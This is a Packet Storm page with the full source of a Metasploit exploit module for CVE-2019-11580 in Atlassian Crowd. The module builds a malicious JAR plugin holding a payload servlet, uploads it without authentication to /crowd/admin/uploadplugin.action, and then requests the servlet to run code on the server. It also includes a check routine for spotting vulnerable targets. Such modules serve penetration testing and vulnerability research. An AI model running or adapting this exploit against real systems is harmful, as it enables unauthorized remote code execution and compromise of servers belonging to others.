what you don't know can hurt you

Atlassian Crowd pdkinstall Remote Code Execution

Atlassian Crowd pdkinstall Remote Code Execution
Posted Aug 12, 2021
Authored by Paul, Corben Leo, Grant Willcox | Site metasploit.com

This Metasploit module can be used to upload a plugin on Atlassian Cloud via the pdkinstall development plugin as an unauthenticated attacker. The payload is uploaded as a JAR archive containing a servlet using a POST request to /crowd/admin/uploadplugin.action. The check command will check that the /crowd/admin/uploadplugin.action page exists and that it responds appropriately to determine if the target is vulnerable or not.

tags | exploit
advisories | CVE-2019-11580
SHA-256 | 3e45d1541858eca07bdf958f9f224a9b488c705ba65f4fdb0909d25e3d5eb68f

Atlassian Crowd pdkinstall Remote Code Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE',
'Description' => %q{
This module can be used to upload a plugin on Atlassian Cloud via
the pdkinstall development plugin as an unauthenticated attacker.
The payload is uploaded as a JAR archive containing a servlet using
a POST request to /crowd/admin/uploadplugin.action. The check command will
check that the /crowd/admin/uploadplugin.action page exists and that it
responds appropriately to determine if the target is vulnerable or not.
},
'Author' => [
'Paul', # Vulnerability discovery
'Corben Leo', # PoC and Vulnerability Writeup. @hacker_ on Twitter.
'Grant Willcox' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2019-11580'],
['URL', 'https://jira.atlassian.com/browse/CWD-5388'],
['URL', 'https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html'],
['URL', 'https://www.corben.io/atlassian-crowd-rce/']
],
'Platform' => %w[java],
'Arch' => ARCH_JAVA,
'DefaultOptions' => {
'HttpClientTimeout' => 25 # Allow a bit more time for the file upload to complete, just in case things are delayed, before timing out.
},
'Notes' =>
{
'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
'Reliability' => [ REPEATABLE_SESSION ],
'Stability' => [ CRASH_SAFE ]
},
'Targets' =>
[
[
'Java Universal',
{
'Arch' => ARCH_JAVA,
'Platform' => 'java'
}
]
],
'DisclosureDate' => '2019-05-22'
)
)

register_options(
[
Opt::RPORT(8095),
OptString.new('TARGETURI', [true, 'The base URI to Atlassian Crowd', '/crowd/']),

]
)
end

def upload_plugin(content)
data = Rex::MIME::Message.new
data.add_part(content, nil, 'binary', "form-data; name=\"file_#{Rex::Text.rand_text_alpha(8..12)}\"; filename=\"#{Rex::Text.rand_text_alpha(8..12)}.jar\"")
send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/admin/uploadplugin.action'),
'method' => 'POST',
'data' => data.to_s,
'ctype' => "multipart/mixed; boundary=#{data.bound}"
}, datastore['HttpClientTimeout'])
end

def generate_plugin_jar
name = Rex::Text.rand_text_alpha(8..12)
servlet_name = Rex::Text.rand_text_alpha(8..12)
atlassian_plugin_xml = %(
<atlassian-plugin key="metasploit.PayloadServlet" name="#{name}" plugins-version="2" class="metasploit.PayloadServlet">
<plugin-info>
<param name="atlassian-data-center-compatible">true</param>
<description></description>
<version>1.0.0</version>
</plugin-info>

<servlet name="#{servlet_name}" key="#{servlet_name}" class="metasploit.PayloadServlet">
<url-pattern>/#{name}</url-pattern>
<description>#{Faker::App.name}</description>
</servlet>
</atlassian-plugin>
)

# Generates .jar file for upload
zip = payload.encoded_jar
zip.add_file('atlassian-plugin.xml', atlassian_plugin_xml)

servlet = MetasploitPayloads.read('java', 'metasploit', 'PayloadServlet.class')
zip.add_file('/metasploit/PayloadServlet.class', servlet)

contents = zip.pack
[contents, name]
end

def check
print_status('Sending a test request to try installing an invalid plugin to see if the server is vulnerable...')
res = upload_plugin(Rex::Text.rand_text_alpha(45..120))
if res.nil?
CheckCode::Unknown('Was not able to connect to the target!')
elsif (res.body =~ /Unable to install plugin/) && (res.code == 400)
CheckCode::Vulnerable("Target responded that it couldn't install an invalid plugin, indicating it's vulnerable!")
else
CheckCode::Safe("Target didn't respond that it couldn't install an invalid plugin, so it's not vulnerable!")
end
end

def exploit
print_status('Generating a malicious JAR plugin...')
content, plugin_name = generate_plugin_jar
print_status('Uploading the malicious JAR plugin...')
upload_plugin(content)
send_request_cgi({
'uri' => normalize_uri(target_uri.path, "/plugins/servlet/#{plugin_name}"),
'method' => 'GET'
}, datastore['HttpClientTimeout'])
end
end
Login or Register to add favorites

File Archive:

May 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    0 Files
  • 2
    May 2nd
    15 Files
  • 3
    May 3rd
    19 Files
  • 4
    May 4th
    24 Files
  • 5
    May 5th
    15 Files
  • 6
    May 6th
    14 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    13 Files
  • 10
    May 10th
    7 Files
  • 11
    May 11th
    99 Files
  • 12
    May 12th
    45 Files
  • 13
    May 13th
    7 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    26 Files
  • 18
    May 18th
    4 Files
  • 19
    May 19th
    17 Files
  • 20
    May 20th
    2 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close